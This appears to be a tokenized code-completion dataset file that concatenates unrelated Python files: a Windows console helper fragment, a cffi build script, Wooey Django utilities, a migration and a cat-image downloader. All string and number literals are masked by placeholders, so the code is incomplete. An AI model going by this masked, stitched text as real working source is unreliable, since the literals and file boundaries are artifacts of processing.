get_buffer_info ( ) <EOL> self . window_width = buf_info . srWindow . Right + <NUM_LIT:1> <EOL> self . window_height = buf_info . srWindow . Bottom + <NUM_LIT:1> <EOL> def get_buffer_info ( self ) : <EOL> """<STR_LIT>""" <EOL> buf_info = CONSOLE_SCREEN_BUFFER_INFO ( ) <EOL> ctypes . windll . kernel32 . GetConsoleScreenBufferInfo ( self . stdout , ctypes . byref ( buf_info ) ) <EOL> return buf_info </s>
<s> import os <EOL> from cffi import FFI <EOL> ffi = FFI ( ) <EOL> ffi . set_source ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> libraries = [ "<STR_LIT:c>" ] , <EOL> ) <EOL> with open ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) as f : <EOL> ffi . cdef ( f . read ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> ffi . compile ( ) </s>
<s> from __future__ import absolute_import <EOL> __author__ = '<STR_LIT>' <EOL> import json <EOL> import errno <EOL> import os <EOL> import re <EOL> import sys <EOL> import six <EOL> import uuid <EOL> import traceback <EOL> from operator import itemgetter <EOL> from collections import OrderedDict , defaultdict <EOL> from pkg_resources import parse_version <EOL> from django . conf import settings <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . db import transaction <EOL> from django . db . utils import OperationalError <EOL> from django . core . files . storage import default_storage <EOL> from django . core . files import File <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . db . models import Q <EOL> from celery . contrib import rdb <EOL> from io import open <EOL> from clinto . parser import Parser <EOL> from . . import settings as wooey_settings <EOL> def sanitize_name ( name ) : <EOL> return name . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> def sanitize_string ( value ) : <EOL> return value . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> def get_storage ( local = True ) : <EOL> if wooey_settings . WOOEY_EPHEMERAL_FILES : <EOL> storage = default_storage . local_storage if local else default_storage <EOL> else : <EOL> storage = default_storage <EOL> return storage <EOL> def purge_output ( job = None ) : <EOL> from . . models import UserFile <EOL> local_storage = get_storage ( local = True ) <EOL> for user_file in UserFile . objects . filter ( job = job ) : <EOL> if user_file . parameter is None or user_file . parameter . parameter . is_output : <EOL> system_file = user_file . system_file <EOL> matching_files = UserFile . objects . filter ( system_file = system_file ) . exclude ( job = user_file . job ) <EOL> if matching_files . count ( ) == <NUM_LIT:0> : <EOL> wooey_file = system_file . filepath . name <EOL> system_file . filepath . delete ( False ) <EOL> system_file . delete ( ) <EOL> path = local_storage . path ( wooey_file ) <EOL> if local_storage . exists ( path ) : <EOL> local_storage . delete ( path ) <EOL> user_file . delete ( ) <EOL> def get_job_commands ( job = None ) : <EOL> script_version = job . script_version <EOL> com = [ sys . executable ] if sys . executable else [ ] <EOL> com . extend ( [ script_version . get_script_path ( ) ] ) <EOL> parameters = job . get_parameters ( ) <EOL> param_dict = OrderedDict ( ) <EOL> for param in parameters : <EOL> subproc_dict = param . get_subprocess_value ( ) <EOL> if subproc_dict is None : <EOL> continue <EOL> subproc_param = subproc_dict [ '<STR_LIT>' ] <EOL> if subproc_param not in param_dict : <EOL> param_dict [ subproc_param ] = [ ] <EOL> subproc_value = subproc_dict . get ( '<STR_LIT:value>' , None ) <EOL> if subproc_value : <EOL> param_dict [ subproc_param ] . append ( subproc_value ) <EOL> for param , values in param_dict . items ( ) : <EOL> if param and not values : <EOL> com . append ( param ) <EOL> else : <EOL> for value in values : <EOL> if param : <EOL> com . append ( param ) <EOL> com . append ( value ) <EOL> return com <EOL> @ transaction . atomic <EOL> def create_wooey_job ( user = None , script_version_pk = None , data = None ) : <EOL> from . . models import Script , WooeyJob , ScriptParameter , ScriptParameters , ScriptVersion <EOL> script_version = ScriptVersion . objects . select_related ( '<STR_LIT>' ) . get ( pk = script_version_pk ) <EOL> if data is None : <EOL> data = { } <EOL> job = WooeyJob ( user = user , job_name = data . pop ( '<STR_LIT>' , None ) , job_description = data . pop ( '<STR_LIT>' , None ) , <EOL> script_version = script_version ) <EOL> job . save ( ) <EOL> parameters = OrderedDict ( [ ( i . slug , i ) for i in ScriptParameter . objects . filter ( slug__in = data . keys ( ) ) . order_by ( '<STR_LIT>' ) ] ) <EOL> for slug , param in six . iteritems ( parameters ) : <EOL> slug_values = data . get ( slug ) <EOL> slug_values = slug_values if isinstance ( slug_values , list ) else [ slug_values ] <EOL> for slug_value in slug_values : <EOL> new_param = ScriptParameters ( job = job , parameter = param ) <EOL> new_param . value = slug_value <EOL> new_param . save ( ) <EOL> return job <EOL> def get_master_form ( script_version = None , pk = None ) : <EOL> from . . forms . factory import DJ_FORM_FACTORY <EOL> return DJ_FORM_FACTORY . get_master_form ( script_version = script_version , pk = pk ) <EOL> def get_form_groups ( script_version = None , pk = None , initial_dict = None , render_fn = None ) : <EOL> from . . forms . factory import DJ_FORM_FACTORY <EOL> return DJ_FORM_FACTORY . get_group_forms ( script_version = script_version , pk = pk , initial_dict = initial_dict , render_fn = render_fn ) <EOL> def reset_form_factory ( script_version = None ) : <EOL> from . . forms . factory import DJ_FORM_FACTORY <EOL> DJ_FORM_FACTORY . reset_forms ( script_version = script_version ) <EOL> def validate_form ( form = None , data = None , files = None ) : <EOL> form . add_wooey_fields ( ) <EOL> form . data = data if data is not None else { } <EOL> form . files = files if files is not None else { } <EOL> form . is_bound = True <EOL> form . full_clean ( ) <EOL> def get_current_scripts ( ) : <EOL> from . . models import ScriptVersion <EOL> try : <EOL> scripts = ScriptVersion . objects . count ( ) <EOL> except OperationalError : <EOL> return <EOL> scripts = ScriptVersion . objects . select_related ( '<STR_LIT>' ) . filter ( default_version = True ) <EOL> non_default_scripts = ScriptVersion . objects . filter ( default_version = False ) . exclude ( script__in = [ i . script for i in scripts ] ) <EOL> script_versions = defaultdict ( list ) <EOL> for sv in non_default_scripts : <EOL> try : <EOL> version_string = parse_version ( str ( sv . script_version ) ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> version_string = sv . script_version <EOL> script_versions [ sv . script . script_name ] . append ( ( version_string , sv . script_iteration , sv ) ) <EOL> [ script_versions [ i ] . sort ( key = itemgetter ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , reverse = True ) for i in script_versions ] <EOL> scripts = [ i . script for i in scripts ] <EOL> if script_versions : <EOL> for script_version_info in script_versions . values ( ) : <EOL> new_scripts = ScriptVersion . objects . select_related ( '<STR_LIT>' ) . filter ( pk__in = [ i [ <NUM_LIT:2> ] . pk for i in script_version_info ] ) <EOL> scripts . extend ( [ i . script for i in new_scripts ] ) <EOL> return scripts <EOL> def get_storage_object ( path , local = False ) : <EOL> storage = get_storage ( local = local ) <EOL> obj = storage . open ( path ) <EOL> obj . url = storage . url ( path ) <EOL> obj . path = storage . path ( path ) <EOL> return obj <EOL> def add_wooey_script ( script_version = None , script_path = None , group = None ) : <EOL> from . . models import Script , ScriptGroup , ScriptParameter , ScriptParameterGroup , ScriptVersion <EOL> local_storage = get_storage ( local = True ) <EOL> if script_version is not None : <EOL> old_name = script_version . script_path . name <EOL> new_name = os . path . normpath ( os . path . join ( wooey_settings . WOOEY_SCRIPT_DIR , old_name ) if not old_name . startswith ( wooey_settings . WOOEY_SCRIPT_DIR ) else old_name ) <EOL> current_storage = get_storage ( local = not wooey_settings . WOOEY_EPHEMERAL_FILES ) <EOL> current_file = current_storage . open ( old_name ) <EOL> if current_storage . exists ( new_name ) : <EOL> new_name = current_storage . get_available_name ( new_name ) <EOL> new_path = current_storage . save ( new_name , current_file ) <EOL> if old_name != new_name : <EOL> current_file . close ( ) <EOL> current_storage . delete ( old_name ) <EOL> current_file = current_storage . open ( new_path ) <EOL> script_version . _rename_script = True <EOL> script_version . script_path . name = new_name <EOL> script_version . save ( ) <EOL> if not local_storage . exists ( new_path ) : <EOL> new_path = local_storage . save ( new_path , current_file ) <EOL> script = get_storage_object ( new_path , local = True ) . path <EOL> local_file = local_storage . open ( new_path ) . name <EOL> else : <EOL> if wooey_settings . WOOEY_EPHEMERAL_FILES : <EOL> remote_storage = get_storage ( local = False ) <EOL> remote_file = remote_storage . open ( script_path ) <EOL> local_file = local_storage . save ( script_path , remote_file ) <EOL> else : <EOL> local_file = local_storage . open ( script_path ) . name <EOL> script = get_storage_object ( local_file , local = True ) . path <EOL> if isinstance ( group , ScriptGroup ) : <EOL> group = group . group_name <EOL> if group is None : <EOL> group = '<STR_LIT>' <EOL> basename , extension = os . path . splitext ( script ) <EOL> filename = os . path . split ( basename ) [ <NUM_LIT:1> ] <EOL> parser = Parser ( script_name = filename , script_path = local_storage . path ( local_file ) ) <EOL> if not parser . valid : <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : parser . error } <EOL> d = parser . get_script_description ( ) <EOL> script_group , created = ScriptGroup . objects . get_or_create ( group_name = group ) <EOL> version_string = d . get ( '<STR_LIT:version>' ) <EOL> if version_string is None : <EOL> version_string = '<STR_LIT:1>' <EOL> try : <EOL> parse_version ( version_string ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> version_string = '<STR_LIT:1>' <EOL> if script_version is None : <EOL> script_kwargs = { '<STR_LIT>' : script_group , '<STR_LIT>' : d [ '<STR_LIT:name>' ] } <EOL> version_kwargs = { '<STR_LIT>' : version_string , '<STR_LIT>' : local_file , '<STR_LIT>' : True } <EOL> script_created = Script . objects . filter ( ** script_kwargs ) . count ( ) == <NUM_LIT:0> <EOL> if script_created : <EOL> script_kwargs . update ( { '<STR_LIT>' : d [ '<STR_LIT:description>' ] } ) <EOL> wooey_script = Script ( ** script_kwargs ) <EOL> wooey_script . _script_cl_creation = True <EOL> wooey_script . save ( ) <EOL> version_kwargs . update ( { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> else : <EOL> wooey_script = Script . objects . get ( ** script_kwargs ) <EOL> if not wooey_script . script_description and d [ '<STR_LIT:description>' ] : <EOL> wooey_script . script_description = d [ '<STR_LIT:description>' ] <EOL> wooey_script . save ( ) <EOL> current_versions = ScriptVersion . objects . filter ( script = wooey_script , script_version = version_string ) <EOL> if current_versions . count ( ) == <NUM_LIT:0> : <EOL> next_iteration = <NUM_LIT:1> <EOL> ScriptVersion . objects . filter ( script = wooey_script , script_version = version_string ) . update ( default_version = False ) <EOL> else : <EOL> next_iteration = sorted ( [ i . script_iteration for i in current_versions ] ) [ - <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> version_kwargs . update ( { '<STR_LIT>' : next_iteration } ) <EOL> version_kwargs . update ( { '<STR_LIT>' : wooey_script } ) <EOL> script_version = ScriptVersion ( ** version_kwargs ) <EOL> script_version . _script_cl_creation = True <EOL> script_version . save ( ) <EOL> else : <EOL> if not script_version . script . script_description : <EOL> script_version . script . script_description = d [ '<STR_LIT:description>' ] <EOL> if not script_version . script . script_name : <EOL> script_version . script . script_name = d [ '<STR_LIT:name>' ] <EOL> past_versions = ScriptVersion . objects . filter ( script = script_version . script , script_version = version_string ) . exclude ( pk = script_version . pk ) <EOL> script_version . script_iteration = past_versions . count ( ) + <NUM_LIT:1> <EOL> past_versions . update ( default_version = False ) <EOL> script_version . default_version = True <EOL> script_version . script . save ( ) <EOL> script_version . save ( ) <EOL> for param_group_info in d [ '<STR_LIT>' ] : <EOL> param_group , created = ScriptParameterGroup . objects . get_or_create ( group_name = param_group_info . get ( '<STR_LIT>' ) , script_version = script_version ) <EOL> for param in param_group_info . get ( '<STR_LIT>' ) : <EOL> is_out = True if ( param . get ( '<STR_LIT>' , None ) == False and param . get ( '<STR_LIT:type>' ) == '<STR_LIT:file>' ) else not param . get ( '<STR_LIT>' , False ) <EOL> script_param , created = ScriptParameter . objects . get_or_create ( script_version = script_version , short_param = param [ '<STR_LIT>' ] , script_param = param [ '<STR_LIT:name>' ] , <EOL> is_output = is_out , required = param . get ( '<STR_LIT>' , False ) , <EOL> form_field = param [ '<STR_LIT>' ] , default = param . get ( '<STR_LIT:value>' ) , input_type = param . get ( '<STR_LIT:type>' ) , <EOL> choices = json . dumps ( param . get ( '<STR_LIT>' ) ) , choice_limit = json . dumps ( param . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) , <EOL> param_help = param . get ( '<STR_LIT>' ) , is_checked = param . get ( '<STR_LIT>' , False ) , <EOL> parameter_group = param_group ) <EOL> return { '<STR_LIT>' : True , '<STR_LIT>' : None , '<STR_LIT>' : script_version } <EOL> def valid_user ( obj , user ) : <EOL> ret = { '<STR_LIT>' : False , '<STR_LIT:error>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> from . . models import Script <EOL> groups = obj . user_groups . all ( ) <EOL> if wooey_settings . WOOEY_ALLOW_ANONYMOUS or user . is_authenticated ( ) : <EOL> if isinstance ( obj , Script ) : <EOL> from itertools import chain <EOL> groups = list ( chain ( groups , obj . script_group . user_groups . all ( ) ) ) <EOL> if not user . is_authenticated ( ) and wooey_settings . WOOEY_ALLOW_ANONYMOUS and len ( groups ) == <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = True <EOL> elif groups : <EOL> ret [ '<STR_LIT:error>' ] = _ ( '<STR_LIT>' ) <EOL> if not groups and obj . is_active : <EOL> ret [ '<STR_LIT>' ] = True <EOL> if obj . is_active is True : <EOL> if set ( list ( user . groups . all ( ) ) ) & set ( list ( groups ) ) : <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' if wooey_settings . WOOEY_SHOW_LOCKED_SCRIPTS else '<STR_LIT>' <EOL> return ret <EOL> def mkdirs ( path ) : <EOL> try : <EOL> os . makedirs ( path ) <EOL> except OSError as exc : <EOL> if exc . errno == errno . EEXIST and os . path . isdir ( path ) : <EOL> pass <EOL> else : <EOL> raise <EOL> def get_upload_path ( filepath , checksum = None ) : <EOL> filename = os . path . split ( filepath ) [ <NUM_LIT:1> ] <EOL> if checksum is None : <EOL> checksum = get_checksum ( filepath ) <EOL> return os . path . join ( wooey_settings . WOOEY_FILE_DIR , checksum [ : <NUM_LIT:2> ] , checksum [ - <NUM_LIT:2> : ] , checksum , filename ) <EOL> def get_file_info ( filepath ) : <EOL> filetype , preview = False , None <EOL> tests = [ ( '<STR_LIT>' , test_delimited ) , ( '<STR_LIT>' , test_fastx ) , ( '<STR_LIT:image>' , test_image ) ] <EOL> while filetype is False and tests : <EOL> ptype , pmethod = tests . pop ( ) <EOL> filetype , preview = pmethod ( filepath ) <EOL> filetype = ptype if filetype else filetype <EOL> preview = None if filetype is False else preview <EOL> filetype = None if filetype is False else filetype <EOL> try : <EOL> json_preview = json . dumps ( preview ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> json_preview = json . dumps ( None ) <EOL> return { '<STR_LIT:type>' : filetype , '<STR_LIT>' : json_preview } <EOL> def test_image ( filepath ) : <EOL> import imghdr <EOL> return imghdr . what ( filepath ) != None , None <EOL> def test_delimited ( filepath ) : <EOL> import csv <EOL> if six . PY3 : <EOL> handle = open ( filepath , '<STR_LIT:r>' , newline = '<STR_LIT>' ) <EOL> else : <EOL> handle = open ( filepath , '<STR_LIT:rb>' ) <EOL> with handle as csv_file : <EOL> try : <EOL> dialect = csv . Sniffer ( ) . sniff ( csv_file . read ( <NUM_LIT> * <NUM_LIT:16> ) , delimiters = '<STR_LIT>' ) <EOL> except Exception as e : <EOL> return False , None <EOL> csv_file . seek ( <NUM_LIT:0> ) <EOL> reader = csv . reader ( csv_file , dialect ) <EOL> rows = [ ] <EOL> try : <EOL> for index , entry in enumerate ( reader ) : <EOL> rows . append ( entry ) <EOL> except Exception as e : <EOL> return False , None <EOL> if len ( rows ) > <NUM_LIT:10> : <EOL> rows = rows [ : <NUM_LIT:5> ] + [ None ] + rows [ - <NUM_LIT:5> : ] <EOL> return True , rows <EOL> def test_fastx ( filepath ) : <EOL> with open ( filepath , encoding = '<STR_LIT>' ) as fastx_file : <EOL> sequences = OrderedDict ( ) <EOL> seq = [ ] <EOL> header = '<STR_LIT>' <EOL> found_caret = False <EOL> for row_index , row in enumerate ( fastx_file , <NUM_LIT:1> ) : <EOL> if row_index > <NUM_LIT:30> : <EOL> break <EOL> if not row . strip ( ) : <EOL> continue <EOL> if found_caret is False and row [ <NUM_LIT:0> ] != '<STR_LIT:>>' : <EOL> if row [ <NUM_LIT:0> ] == '<STR_LIT:;>' : <EOL> continue <EOL> break <EOL> elif found_caret is False and row [ <NUM_LIT:0> ] == '<STR_LIT:>>' : <EOL> found_caret = True <EOL> if row and row [ <NUM_LIT:0> ] == '<STR_LIT:>>' : <EOL> if seq : <EOL> sequences [ header ] = '<STR_LIT>' . join ( seq ) <EOL> seq = [ ] <EOL> header = row <EOL> elif row : <EOL> seq . append ( row ) <EOL> if seq and header : <EOL> sequences [ header ] = '<STR_LIT>' . join ( seq ) <EOL> if sequences : <EOL> rows = [ ] <EOL> [ rows . extend ( [ i , v ] ) for i , v in six . iteritems ( sequences ) ] <EOL> return True , rows <EOL> return False , None <EOL> def create_job_fileinfo ( job ) : <EOL> parameters = job . get_parameters ( ) <EOL> from . . models import WooeyFile , UserFile <EOL> files = [ ] <EOL> local_storage = get_storage ( local = True ) <EOL> for field in parameters : <EOL> try : <EOL> if field . parameter . form_field == '<STR_LIT>' : <EOL> value = field . value <EOL> if value is None : <EOL> continue <EOL> if isinstance ( value , six . string_types ) : <EOL> if local_storage . exists ( value ) : <EOL> if not get_storage ( local = False ) . exists ( value ) : <EOL> get_storage ( local = False ) . save ( value , File ( local_storage . open ( value ) ) ) <EOL> value = field . value <EOL> else : <EOL> field . force_value ( None ) <EOL> try : <EOL> with transaction . atomic ( ) : <EOL> field . save ( ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> continue <EOL> d = { '<STR_LIT>' : field , '<STR_LIT:file>' : value } <EOL> if field . parameter . is_output : <EOL> full_path = os . path . join ( job . save_path , os . path . split ( local_storage . path ( value ) ) [ <NUM_LIT:1> ] ) <EOL> checksum = get_checksum ( value , extra = [ job . pk , full_path , '<STR_LIT>' ] ) <EOL> d [ '<STR_LIT>' ] = checksum <EOL> files . append ( d ) <EOL> except ValueError : <EOL> continue <EOL> known_files = { i [ '<STR_LIT:file>' ] . name for i in files } <EOL> file_groups = { '<STR_LIT>' : [ ] } <EOL> absbase = os . path . join ( settings . MEDIA_ROOT , job . save_path ) <EOL> for root , dirs , dir_files in os . walk ( absbase ) : <EOL> for filename in dir_files : <EOL> new_name = os . path . join ( job . save_path , filename ) <EOL> if any ( [ i . endswith ( new_name ) for i in known_files ] ) : <EOL> continue <EOL> try : <EOL> filepath = os . path . join ( root , filename ) <EOL> if os . path . isdir ( filepath ) : <EOL> continue <EOL> full_path = os . path . join ( job . save_path , filename ) <EOL> checksum = get_checksum ( filepath , extra = [ job . pk , full_path , '<STR_LIT>' ] ) <EOL> try : <EOL> storage_file = get_storage_object ( full_path ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( full_path , traceback . format_exc ( ) ) ) <EOL> continue <EOL> d = { '<STR_LIT:name>' : filename , '<STR_LIT:file>' : storage_file , '<STR_LIT>' : storage_file . size , '<STR_LIT>' : checksum } <EOL> if filename . endswith ( '<STR_LIT>' ) or filename . endswith ( '<STR_LIT>' ) : <EOL> file_groups [ '<STR_LIT>' ] . append ( d ) <EOL> else : <EOL> files . append ( d ) <EOL> except IOError : <EOL> sys . stderr . write ( '<STR_LIT:{}>' . format ( traceback . format_exc ( ) ) ) <EOL> continue <EOL> file_groups [ '<STR_LIT:all>' ] = files <EOL> file_groups [ '<STR_LIT:image>' ] = [ ] <EOL> file_groups [ '<STR_LIT>' ] = [ ] <EOL> file_groups [ '<STR_LIT>' ] = [ ] <EOL> for filemodel in files : <EOL> fileinfo = get_file_info ( filemodel [ '<STR_LIT:file>' ] . path ) <EOL> filetype = fileinfo . get ( '<STR_LIT:type>' ) <EOL> if filetype is not None : <EOL> file_groups [ filetype ] . append ( dict ( filemodel , ** { '<STR_LIT>' : fileinfo . get ( '<STR_LIT>' ) } ) ) <EOL> else : <EOL> filemodel [ '<STR_LIT>' ] = json . dumps ( None ) <EOL> grouped = set ( [ i [ '<STR_LIT:file>' ] . path for file_type , groups in six . iteritems ( file_groups ) for i in groups if file_type != '<STR_LIT:all>' ] ) <EOL> for file_type , group_files in six . iteritems ( file_groups ) : <EOL> for group_file in group_files : <EOL> if file_type == '<STR_LIT:all>' and group_file [ '<STR_LIT:file>' ] . path in grouped : <EOL> continue <EOL> try : <EOL> preview = group_file . get ( '<STR_LIT>' ) <EOL> size_bytes = group_file . get ( '<STR_LIT>' ) <EOL> filepath = group_file [ '<STR_LIT:file>' ] . path <EOL> save_path = job . get_relative_path ( filepath ) <EOL> parameter = group_file . get ( '<STR_LIT>' ) <EOL> checksum = group_file . get ( '<STR_LIT>' , get_checksum ( filepath ) ) <EOL> try : <EOL> wooey_file = WooeyFile . objects . get ( checksum = checksum ) <EOL> file_created = False <EOL> except ObjectDoesNotExist : <EOL> wooey_file = WooeyFile ( <EOL> checksum = checksum , <EOL> filetype = file_type , <EOL> filepreview = preview , <EOL> size_bytes = size_bytes , <EOL> filepath = save_path <EOL> ) <EOL> file_created = True <EOL> userfile_kwargs = { <EOL> '<STR_LIT>' : job , <EOL> '<STR_LIT>' : parameter , <EOL> '<STR_LIT>' : wooey_file , <EOL> '<STR_LIT:filename>' : os . path . split ( filepath ) [ <NUM_LIT:1> ] <EOL> } <EOL> try : <EOL> with transaction . atomic ( ) : <EOL> if file_created : <EOL> wooey_file . save ( ) <EOL> job . save ( ) <EOL> UserFile . objects . get_or_create ( ** userfile_kwargs ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> continue <EOL> def get_checksum ( path , extra = None ) : <EOL> import hashlib <EOL> BLOCKSIZE = <NUM_LIT> <EOL> hasher = hashlib . sha1 ( ) <EOL> if extra : <EOL> if isinstance ( extra , ( list , tuple ) ) : <EOL> for i in extra : <EOL> hasher . update ( six . u ( str ( i ) ) . encode ( '<STR_LIT:utf-8>' ) ) <EOL> elif isinstance ( extra , six . string_types ) : <EOL> hasher . update ( extra ) <EOL> if isinstance ( path , six . string_types ) : <EOL> with open ( path , '<STR_LIT:rb>' ) as afile : <EOL> buf = afile . read ( BLOCKSIZE ) <EOL> while len ( buf ) > <NUM_LIT:0> : <EOL> hasher . update ( buf ) <EOL> buf = afile . read ( BLOCKSIZE ) <EOL> else : <EOL> start = path . tell ( ) <EOL> path . seek ( <NUM_LIT:0> ) <EOL> buf = path . read ( BLOCKSIZE ) <EOL> while len ( buf ) > <NUM_LIT:0> : <EOL> hasher . update ( buf ) <EOL> buf = path . read ( BLOCKSIZE ) <EOL> path . seek ( start ) <EOL> return hasher . hexdigest ( ) <EOL> def get_grouped_file_previews ( files ) : <EOL> groups = { '<STR_LIT:all>' : [ ] } <EOL> for file_info in files : <EOL> system_file = file_info . system_file <EOL> filedict = { '<STR_LIT:id>' : system_file . id , <EOL> '<STR_LIT:object>' : system_file , <EOL> '<STR_LIT:name>' : file_info . filename , <EOL> '<STR_LIT>' : json . loads ( system_file . filepreview ) if system_file . filepreview else None , <EOL> '<STR_LIT:url>' : get_storage ( local = False ) . url ( system_file . filepath . name ) , <EOL> '<STR_LIT>' : file_info . parameter . parameter . script_param if file_info . parameter else None , <EOL> '<STR_LIT>' : os . path . basename ( system_file . filepath . name ) , <EOL> '<STR_LIT>' : system_file . filetype , <EOL> '<STR_LIT>' : system_file . size_bytes , <EOL> } <EOL> try : <EOL> groups [ system_file . filetype ] . append ( filedict ) <EOL> except KeyError : <EOL> groups [ system_file . filetype ] = [ filedict ] <EOL> if system_file . filetype != '<STR_LIT:all>' : <EOL> groups [ '<STR_LIT:all>' ] . append ( filedict ) <EOL> return groups <EOL> def get_file_previews ( job ) : <EOL> from . . models import UserFile <EOL> files = UserFile . objects . filter ( job = job ) <EOL> return get_grouped_file_previews ( files ) <EOL> def get_file_previews_by_ids ( ids ) : <EOL> from . . models import UserFile <EOL> files = UserFile . objects . filter ( pk__in = ids ) <EOL> return get_grouped_file_previews ( files ) <EOL> def normalize_query ( query_string , <EOL> findterms = re . compile ( r'<STR_LIT>' ) . findall , <EOL> normspace = re . compile ( r'<STR_LIT>' ) . sub ) : <EOL> """<STR_LIT>""" <EOL> return [ normspace ( '<STR_LIT:U+0020>' , ( t [ <NUM_LIT:0> ] or t [ <NUM_LIT:1> ] ) . strip ( ) ) for t in findterms ( query_string ) ] <EOL> def get_query ( query_string , search_fields ) : <EOL> """<STR_LIT>""" <EOL> query = None <EOL> terms = normalize_query ( query_string ) <EOL> for term in terms : <EOL> or_query = None <EOL> for field_name in search_fields : <EOL> q = Q ( ** { "<STR_LIT>" % field_name : term } ) <EOL> if or_query is None : <EOL> or_query = q <EOL> else : <EOL> or_query = or_query | q <EOL> if query is None : <EOL> query = or_query <EOL> else : <EOL> query = query & or_query <EOL> if query is None : <EOL> query = Q ( ) <EOL> return query </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( to = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> __author__ = '<STR_LIT>' <EOL> import argparse <EOL> import sys <EOL> import os <EOL> from urllib import FancyURLopener <EOL> from apiclient import discovery <EOL> description = """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = description ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , type = int , default = <NUM_LIT:1> ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , type = str , choices = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> class MyOpener ( FancyURLopener ) : <EOL> version = '<STR_LIT>' <EOL> myopener = MyOpener ( ) <EOL> def main ( ) : <EOL> args = parser . parse_args ( ) <EOL> searchTerm = '<STR_LIT>' if args . kittens else '<STR_LIT>' <EOL> cat_count = args . count if args . count < <NUM_LIT:10> else <NUM_LIT:10> <EOL> if args . breed : <EOL> searchTerm += '<STR_LIT>' . format ( args . breed ) <EOL> service = discovery . build ( '<STR_LIT>' , '<STR_LIT>' , developerKey = os . environ . get ( '<STR_LIT>' ) ) <EOL> cse = service . cse ( ) <EOL> search_kwrds = { <EOL> '<STR_LIT:q>' : searchTerm , <EOL> '<STR_LIT>' : os . environ . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cat_count , <EOL> '<STR_LIT>' : '<STR_LIT:image>' <EOL> } <EOL> request = cse . list ( ** search_kwrds ) <EOL> response = request . execute ( ) <EOL> for item in response [ '<STR_LIT>' ] : <EOL> url = item . get ( '<STR_LIT>' ) <EOL> filename = url . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> myopener . retrieve ( url , filename ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
